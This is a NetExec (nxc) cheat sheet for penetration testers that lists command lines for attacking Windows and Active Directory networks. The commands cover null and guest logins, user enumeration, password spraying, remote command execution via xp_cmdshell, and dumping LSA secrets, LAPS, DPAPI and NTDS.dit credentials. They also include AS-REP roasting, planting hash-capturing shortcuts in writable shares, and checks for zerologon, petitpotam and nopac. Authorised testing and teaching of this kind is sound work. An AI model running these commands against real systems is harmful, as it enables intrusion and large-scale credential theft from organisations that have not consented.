NetExec CheatSheet

NetExec is a powerful tool for network enumeration, spraying, and various other penetration testing tasks. This guide provides an overview of its functionalities and commands to help you get started

https://github.com/Pennyw0rth/NetExec

Enumeration
Spraying
SMB
LDAP
MSSQL
Secrets Dump
Asreproast
Bloodhound
Useful Modules

NXC

nxc
usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--verbose] [--debug] [--no-progress] [--log LOG] [-6]
           [--dns-server DNS_SERVER] [--dns-tcp] [--dns-timeout DNS_TIMEOUT] [--version]
           {winrm,ftp,rdp,wmi,smb,ldap,vnc,mssql,ssh} ...
options:
  -h, --help            show this help message and exit
  --version             Display nxc version

Generic:
  Generic options for nxc across protocols

  -t THREADS, --threads THREADS
                        set how many concurrent threads to use
  --timeout TIMEOUT     max timeout in seconds of each thread
  --jitter INTERVAL     sets a random delay between each authentication

Output:
  Options to set verbosity levels and control output

  --verbose             enable verbose output
  --debug               enable debug level information
  --no-progress         do not displaying progress bar during scan
  --log LOG             export result into a custom file

DNS:
  -6                    Enable force IPv6
  --dns-server DNS_SERVER
                        Specify DNS server (default: Use hosts file & System DNS)
  --dns-tcp             Use TCP instead of UDP for DNS queries
  --dns-timeout DNS_TIMEOUT
                        DNS query timeout in seconds

Available Protocols:
  {winrm,ftp,rdp,wmi,smb,ldap,vnc,mssql,ssh}
    winrm               own stuff using WINRM
    ftp                 own stuff using FTP
    rdp                 own stuff using RDP
    wmi                 own stuff using WMI
    smb                 own stuff using SMB
    ldap                own stuff using LDAP
    vnc                 own stuff using VNC
    mssql               own stuff using MSSQL
    ssh                 own stuff using SSH

Enumeration

Initial Enumeration

nxc smb target

Null Authentication

nxc smb target -u '' -p ''

Guest Authentication

nxc smb target -u 'guest' -p ''

List Shares

nxc smb target -u '' -p '' --shares

nxc smb target -u username -p password --shares

List Usernames

nxc smb target -u '' -p '' --users

nxc smb target -u '' -p '' --rid-brute

nxc smb target -u username -p password --users

Local Authentication

nxc smb target -u username -p password --local-auth

Using Kerberos

nxc smb target -u username -p password -k

Check for Hosts with SMB Signing Disabled

nxc smb target(s) --gen-relay-list relay.txt

Spraying

Password Spray

nxc smb target -u users.txt -p password --continue-on-success

nxc smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

nxc ssh target(s) -u username -p password --continue-on-success

SMB

All In One

nxc smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

nxc smb target -u username -p password -M spider_plus

nxc smb target -u username -p password -M spider_plus -o READ_ONLY=false

Dump a Specific File

nxc smb target -u username -p password -k --get-file target_file output_file --share sharename

LDAP

Enumerate Users Using LDAP

nxc ldap target -u '' -p '' --users

All In One

nxc ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups

MSSQL

Authentication

nxc mssql target -u username -p password

Execute Commands Using `xp_cmdshell`

Use -X for PowerShell and -x for cmd

nxc mssql target -u username -p password -x command_to_execute

Get a File

nxc mssql target -u username -p password --get-file output_file target_file

Secrets Dump

Dump LSA Secrets

nxc smb target -u username -p password --local-auth --lsa

GMSA

nxc ldap target -u username -p password --gmsa-convert-id id

nxc ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

Group Policy Preferences

nxc smb target -u username -p password -M gpp_password

Dump LAPS Password

nxc smb target -u username -p password --laps

Dump DPAPI Credentials

nxc smb target -u username -p password --laps --dpapi

Dump NTDS.dit

nxc smb target -u username -p password --ntds

Asreproast

nxc ldap target -u username -p password --asreproast asrep.txt

Bloodhound

nxc ldap target -u username -p password --bloodhound -ns ip --collection All

Useful Modules

Webdav

Checks whether the WebClient service is running on the target

nxc smb ip -u username -p password -M webdav

Veeam

Extracts credentials from the local Veeam SQL Database

nxc smb target -u username -p password -M veeam

Slinky

Creates Windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

nxc smb ip -u username -p password -M slinky

Ntdsutil

Dump NTDS with ntdsutil

nxc smb ip -u username -p password -M ntdsutil

Ldap-checker

Checks whether LDAP signing and binding are required and/or enforced

nxc ldap target -u username -p password -M ldap-checker

Check for Vulnerabilities

Check if the DC is vulnerable to zerologon, petitpotam, or nopac

nxc smb target -u username -p password -M zerologon

nxc smb target -u username -p password -M petitpotam

nxc smb target -u username -p password -M nopac

Check the MachineAccountQuota

nxc ldap target -u username -p password -M maq

ADCS Enumeration

nxc ldap target -u username -p password -M adcs

For more detailed installation instructions, visit the NetExec.

On this page